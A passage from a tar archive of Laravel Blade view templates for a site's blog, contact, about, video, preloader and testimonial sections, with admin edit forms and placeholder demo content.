route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> @endif <div class="blog-body"> <div class="blog-meta"> <a href="#"> <span><i class="far fa-user"></i>@if ($item->type == "with_this_account") {{ $item->author_name }} @else {{ __('frontend.anonymous') }} @endif</span> </a> <a href="#"> <span><i class="far fa-bookmark"></i>{{ $item->category_name }}</span> </a> </div> <h5> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}">{{ $item->title }}</a> </h5> @if (!empty($item->short_description)) <p>{{ $item->short_description }}</p> @endif <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}" class="blog-link"> {{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> @endforeach @unset ($item) </div> <div class="row mt-5"> <div class="col-xl-12"> <div class="easier-pagination-container"> {{ $blogs_paginate_style->links() }} </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> How To Create A Design Brief </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> Work On The Latest UI Design Models </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> The Golden Rule Between Unique Design </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Wordpress</span></a> </div> <h5> <a href="#"> How to set up a Wordpress website ? </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Laravel</span></a> </div> <h5> <a href="#"> Creating projects in Laravel 8 </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="col-lg-4 col-md-6"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Wordpress</span></a> </div> <h5> <a href="#"> How to create custom post type ? </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> </div> @endif @endif </section> <!--// Blog Section End //--> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_blog') }} </button> </form> </div> </div> @endcan @endif ����������������views/frontend/sections/blog/blog-style1.blade.php��������������������������������������������������0000644�����������������00000042300�14765366572�0016237 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('blog check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Blog Section Start //--> <section class="section pb-minus-76" id="blog"> <div class="container"> @if(Auth::user()) @can('blog check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($blog_section_style1) <div class="row"> <div class="col-md-6"> <div class="section-heading-left"> <span>@php echo html_entity_decode($blog_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($blog_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6"> <div class="section-heading-left"> <span>Blog</span> <h2>Our Blog</h2> </div> </div> </div> @endif @endisset @if (is_countable($blogs_style1) && count($blogs_style1) > 0) <div class="owl-carousel owl-theme" id="blogCarousel"> @foreach ($blogs_style1 as $item) <div class="item"> @if(Auth::user()) @can('blog check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="blog-item"> @if (!empty($item->section_image)) <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/blog/thumbnail/'.$item->section_image) }}" alt="Blog image" class="img-fluid"> </a> </div> @else <div class="blog-img"> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> @endif <div class="blog-body"> <div class="blog-meta"> <a href="#"> <span><i class="far fa-user"></i>@if ($item->type == "with_this_account") {{ $item->author_name }} @else {{ __('frontend.anonymous') }} @endif</span> </a> <a href="#"> <span><i class="far fa-bookmark"></i>{{ $item->category_name }}</span> </a> </div> <h5> <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}">{{ $item->title }}</a> </h5> @if (!empty($item->short_description)) <p>{{ $item->short_description }}</p> @endif <a href="{{ route('default-blog-detail-show', ['slug' => $item->slug]) }}" class="blog-link"> {{ __('frontend.read_more') }} <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="owl-carousel owl-theme" id="blogCarousel"> <div class="item"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> How To Create A Design Brief </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="item"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> Work On The Latest UI Design Models </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="item"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Design</span></a> </div> <h5> <a href="#"> The Golden Rule Between Unique Design </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> <div class="item"> <div class="blog-item"> <div class="blog-img"> <a href="#"> <img src="{{ asset('uploads/img/dummy/600x400.jpg') }}" alt="Blog image" class="img-fluid"> </a> </div> <div class="blog-body"> <div class="blog-meta"> <a href="#"><span><i class="far fa-user"></i>By Admin</span></a> <a href="#"><span><i class="far fa-bookmark"></i>Wordpress</span></a> </div> <h5> <a href="#"> How to set up a Wordpress website ? </a> </h5> <p> It is a long established fact that a reader will be distracted [..] </p> <a href="#" class="blog-link"> Read More <i class="fa fa-arrow-right"></i> </a> </div> </div> </div> </div> @endif @endif <div class="row mt-5"> @isset ($blog_section_style1) <div class="col-md-12 text-center"> <a href="{{ $blog_section_style1->button_url }}" class="primary-btn"> <span class="text">{{ $blog_section_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-md-12 text-center"> <a href="javascript:void(0)" class="primary-btn"> <span class="text">Get Started</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> </div> @endif @endisset </div> </div> </section> <!--// Blog Section End //--> @if(Auth::user()) @can('blog check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="blog.create"> <input type="hidden" name="style" value=""> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_blog') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/contact/style1-contact.blade.php��������������������������������������������0000644�����������������00000000053�14765366572�0017456 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<livewire:contact-easier style="style1"/> �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/contact/contact-style1.blade.php��������������������������������������������0000644�����������������00000021750�14765366572�0017465 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Contact Section Start //--> <section class="section bg-primary-light" id="contact" data-scroll-index="7"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($contact_info_section_style1) <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>@php echo html_entity_decode($contact_info_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($contact_info_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row justify-content-center"> <div class="col-lg-6"> <div class="section-heading"> <span>Contact Me</span> <h2>Contact Us</h2> </div> </div> </div> @endif @endisset @if (is_countable($contact_infos_style1) && count($contact_infos_style1) > 0) <div class="row"> @foreach ($contact_infos_style1 as $item) <div class="col-lg-6"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="contact-info.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="contact-info-item"> @if ($item->type == "image") @if (!empty($item->section_image)) <div class="icon"> <img src="{{ asset('uploads/img/contact_info/'.$item->section_image) }}" alt="feature image"> </div> @endif @else <div class="icon"> <span class="{{ $item->icon }}"></span> </div> @endif <div class="body"> <h5>@php echo html_entity_decode($item->title); @endphp</h5> <p>@php echo html_entity_decode($item->description); @endphp</p> </div> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-lg-6"> <div class="contact-info-item"> <div class="icon"> <span class="fa fa-map-marker-alt"></span> </div> <div class="body"> <h5>Address</h5> <p>1395 Nixon Avenue Etowah, TN 37331 <br> United States </p> </div> </div> </div> <div class="col-lg-6"> <div class="contact-info-item"> <div class="icon"> <span class="fas fa-envelope-open-text"></span> </div> <div class="body"> <h5>E-Mail Phone:</h5> <p>elsecolor@gmail.com</p> <p>+1 422-200-5555</p> </div> </div> </div> </div> @endif @endif <div class="row justify-content-center"> <div class="col-lg-12"> @include('frontend.sections.contact.style1-contact') </div> </div> </div> </section> <!--// Contact Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="contact-info.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_section_title_description') }} </button> </form> <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="contact-info.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white"> <i class="fa fa-plus text-white"></i> {{ __('content.add_contact_info') }} </button> </form> </div> </div> @endcan @endif ������������������������views/frontend/sections/about/about-style1.blade.php������������������������������������������������0000644�����������������00000043533�14765366572�0016626 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// About Section Start //--> <section class="section" id="about"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row"> @isset ($about_section_style1) @if (!empty($about_section_style1->section_image) && !empty($about_section_style1->video_url)) <div class="col-lg-6"> <div class="about-img wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> @if (!empty($about_section_style1->section_image)) <img src="{{ asset('uploads/img/about/'.$about_section_style1->section_image) }}" alt="About image" title="About image" class="img-fluid"> @endif @if (!empty($about_section_style1->video_url)) @if ($about_section_style1->video_type == 'youtube') <a class="about-video-btn" href="{{ $about_section_style1->video_url }}"><i class="fa fa-play"></i></a> @else <a class="about-video-btn-2" href="{{ $about_section_style1->video_url }}"><i class="fa fa-play"></i></a> @endif <div class="video-border-line"></div> @endif </div> </div> @endif @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="col-lg-6"> <div class="about-img wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.2s"> <img src="{{ asset('uploads/img/dummy/480x600.jpg') }}" alt="About image" title="About image" class="img-fluid"> <a class="about-video-btn" href="https://www.youtube.com/watch?v=YqQx75OPRa0"><i class="fa fa-play"></i></a> <div class="video-border-line"></div> </div> </div> @endif @endisset <div class="col-lg-6"> <div class="about-inner wow fadeInUp" data-wow-duration="0.5s" data-wow-delay="0.1s"> @isset ($about_section_style1) <h6>@php echo html_entity_decode($about_section_style1->section_title); @endphp</h6> <h2>@php echo html_entity_decode($about_section_style1->title); @endphp</h2> <p>@php echo html_entity_decode($about_section_style1->description); @endphp</p> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <h6>About Us</h6> <h2>We are here with 10 years of user experience</h2> <p> We are prevent your loss of time and indecision in the works I have taken and the projects I have done and offer the best solution. Many of my customers and brands express their satisfaction with working with me.We can appeal to a huge audience and grow your business. </p> @endif @endisset @if (is_countable($about_section_features_style1) && count($about_section_features_style1) > 0) <div class="row"> <div class="col-md-6 col-sm-6"> <ul class="mb-resp-15"> @foreach($about_section_features_style1 as $index => $item) @if($index < count($about_section_features_style1) / 2) <li> <div class="text"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="about.edit_feature"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <h5>@php echo html_entity_decode($item->title); @endphp</h5> <p>@php echo html_entity_decode($item->description); @endphp</p> </div> </li> @endif @endforeach @unset ($item) </ul> </div> <div class="col-md-6 col-sm-6"> <ul> @foreach($about_section_features_style1 as $index => $item) @if($index >= count($about_section_features_style1) / 2) <li> <div class="text"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="about.edit_feature"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <h5>@php echo html_entity_decode($item->title); @endphp</h5> <p>@php echo html_entity_decode($item->description); @endphp</p> </div> </li> @endif @endforeach @unset ($item) </ul> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6 col-sm-6"> <ul class="mb-resp-15"> <li> <div class="text"> <h5>Name :</h5> <p>Matheus Bartelli</p> </div> </li> <li> <div class="text"> <h5>Country :</h5> <p>United States</p> </div> </li> <li> <div class="text"> <h5>Freelance :</h5> <p>Available</p> </div> </li> </ul> </div> <div class="col-md-6 col-sm-6"> <ul> <li> <div class="text"> <h5>University :</h5> <p>Pratt Institute</p> </div> </li> <li> <div class="text"> <h5>Languages :</h5> <p>English,Deutch,Arabic</p> </div> </li> <li> <div class="text"> <h5>Address :</h5> <p>Etowah, TN 37331 United States</p> </div> </li> </ul> </div> </div> @endif @endif @isset ($about_section_style1) @if (!empty($about_section_style1->button_name)) <a href="{{ $about_section_style1->button_url }}" class="primary-btn me-3 mb-3"> <span class="text">{{ $about_section_style1->button_name }}</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> @endif @if (!empty($about_section_style1->button_name_2)) <a href="@if (!empty($about_section_style1->cv_file)){{ asset('uploads/img/about/'.$about_section_style1->cv_file) }} @else # @endif" class="primary-btn" @if (!empty($about_section_style1->cv_file)) download @endif> <span class="text">{{ $about_section_style1->button_name_2 }}</span> <span class="icon"><i class="fa fa-download"></i></span> </a> @endif @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <a href="javascript:void(0)" class="primary-btn me-3 mb-3"> <span class="text">Get Started</span> <span class="icon"><i class="fa fa-arrow-right"></i></span> </a> <a href="javascript:void(0)" class="primary-btn"> <span class="text">Download Cv</span> <span class="icon"><i class="fa fa-download"></i></span> </a> @endif @endisset </div> </div> </div> </div> </section> <!--// About Section End //--> @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="about.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_about') }} </button> </form> </div> </div> @endcan @endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/preloader/preloader.blade.php�����������������������������������������������0000644�����������������00000001152�14765366572�0017104 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@isset ($preloader) @if ($preloader->status == 'enable') <div id="preloader-wrap"> <div class="preloader-inner"> <div class="lds-roller"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div> </div> </div> <!--// Preloader // --> @endif @else <div id="preloader-wrap"> <div class="preloader-inner"> <div class="lds-roller"><div></div><div></div><div></div><div></div><div></div><div></div><div></div><div></div></div> </div> </div> <!--// Preloader // --> @endisset ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/video/video-style1.blade.php������������������������������������������������0000644�����������������00000012234�14765366572�0016610 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif @isset ($video_section_style1) <!--// Borg Video Section Start //--> <section class="section" id="borgsection" @if (!empty($video_section_style1->section_image)) data-bg-image-path="{{ asset('uploads/img/video/'.$video_section_style1->section_image) }}" @endif> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="borgsection-inner"> <h3>@php echo html_entity_decode($video_section_style1->title); @endphp</h3> @if (!empty($video_section_style1->video_url)) <div class="borg-video-wrap"> @if ($video_section_style1->video_type == 'youtube') <a class="borgsection-video-btn" href="{{ $video_section_style1->video_url }}0"><i class="fa fa-play"></i></a> @else <a class="borgsection-video-btn-2" href="{{ $video_section_style1->video_url }}0"><i class="fa fa-play"></i></a> @endif </div> @endif </div> </div> </div> </div> </section> <!--// Borg Video Section End //--> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <!--// Borg Video Section Start //--> <section class="section" id="borgsection" data-bg-image-path="{{ asset('uploads/img/dummy/1920x640.jpg') }}"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif <div class="row justify-content-center"> <div class="col-lg-8"> <div class="borgsection-inner"> <h3>Stay informed about us by watching our sponsor video</h3> <div class="borg-video-wrap"> <a class="borgsection-video-btn" href="https://www.youtube.com/watch?v=YqQx75OPRa0"><i class="fa fa-play"></i></a> </div> </div> </div> </div> </div> </section> <!--// Borg Video Section End //--> @endif @endisset @if(Auth::user()) @can('section check') </div> <div class="easier-middle"> @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="video.create"> <input type="hidden" name="style" value="style1"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="custom-btn text-white me-2 mb-2"> <i class="fa fa-edit text-white"></i> {{ __('content.edit_video') }} </button> </form> </div> </div> @endcan @endif ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/frontend/sections/testimonial/testimonial-style1.blade.php������������������������������������0000644�����������������00000034067�14765366572�0021264 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@if(Auth::user()) @can('section check') <div class="easier-mode"> <div class="easier-section-area"> @endcan @endif <!--// Testimonial Section Start //--> <section class="section pb-minus-76 bg-primary-light"> <div class="container"> @if(Auth::user()) @can('section check') <!-- hover effect for mobile devices --> <div class="click-icon d-md-none text-center"> <button class="custom-btn text-white"> <i class="fa fa-mobile-alt text-white"></i> {{ __('content.touch') }} </button> </div> @endcan @endif @isset ($testimonial_section_style1) <div class="row"> <div class="col-md-6"> <div class="section-heading-left"> <span>@php echo html_entity_decode($testimonial_section_style1->section_title); @endphp</span> <h2>@php echo html_entity_decode($testimonial_section_style1->title); @endphp</h2> </div> </div> </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="row"> <div class="col-md-6"> <div class="section-heading-left"> <span>Testimonial</span> <h2>Our Clients</h2> </div> </div> </div> @endif @endisset @if (is_countable($testimonials_style1) && count($testimonials_style1) > 0) <div class="owl-carousel owl-theme" id="testimonialCarousel"> @foreach ($testimonials_style1 as $item) <div class="item"> @if(Auth::user()) @can('section check') @php $url = request()->path(); $modified_url = str_replace('/', '-bracket-', $url); @endphp <form method="POST" action="{{ route('site-url.index') }}" class="d-inline-block"> @csrf <input type="hidden" name="route" value="testimonial.edit"> <input type="hidden" name="single_id" value="{{ $item->id }}"> <input type="hidden" name="site_url" value="{{ $modified_url }}"> <button type="submit" class="me-2 custom-pure-button "> <i class="fa fa-edit text-info easier-custom-font-size-24"></i> </button> </form> @endcan @endif <div class="testimonial-item"> @if (!empty($item->section_image)) <div class="img"> <img src="{{ asset('uploads/img/testimonial/'.$item->section_image) }}" alt="Testimonial image" class="img-fluid"> </div> @endif <div class="body"> <h5>{{ $item->name }}</h5> <span>{{ $item->job }}</span> <p>{{ $item->description }}</p> <div class="rating"> @for ($t = 0; $t < $item->star; $t++) <i class="fa fa-star"></i> @endfor @for ($t = 0; $t < 5-$item->star; $t++) <i class="far fa-star"></i> @endfor </div> </div> <span class="quote-icon"> <i class="fas fa-quote-right"></i> </span> </div> </div> @endforeach @unset ($item) </div> @else @if (Auth::user() || $draft_view == null || $draft_view->status == 'enable') <div class="owl-carousel owl-theme" id="testimonialCarousel"> <div class="item"> <div class="testimonial-item"> <div class="img"> <img src="{{ asset('uploads/img/dummy/80x80.jpg') }}" alt="Testimonial image" class="img-fluid"> </div> <div class="body"> <h5>Jeff N. Hood</h5> <span>New Customer</span> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <div class="rating"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> </div> <span class="quote-icon"> <i class="fas fa-quote-right"></i> </span> </div> </div> <div class="item"> <div class="testimonial-item"> <div class="img"> <img src="{{ asset('uploads/img/dummy/80x80.jpg') }}" alt="Testimonial image" class="img-fluid"> </div> <div class="body"> <h5>James E. Nelson</h5> <span>New Customer</span> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <div class="rating"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> </div> <span class="quote-icon"> <i class="fas fa-quote-right"></i> </span> </div> </div> <div class="item"> <div class="testimonial-item"> <div class="img"> <img src="{{ asset('uploads/img/dummy/80x80.jpg') }}" alt="Testimonial image" class="img-fluid"> </div> <div class="body"> <h5>Wallace Chuck</h5> <span>New Customer</span> <p> It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout. </p> <div class="rating"> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> <i class="fa fa-star"></i> </div> </div> <span class="quote-icon"> <i class="fas fa-quote-right"></i> </span> 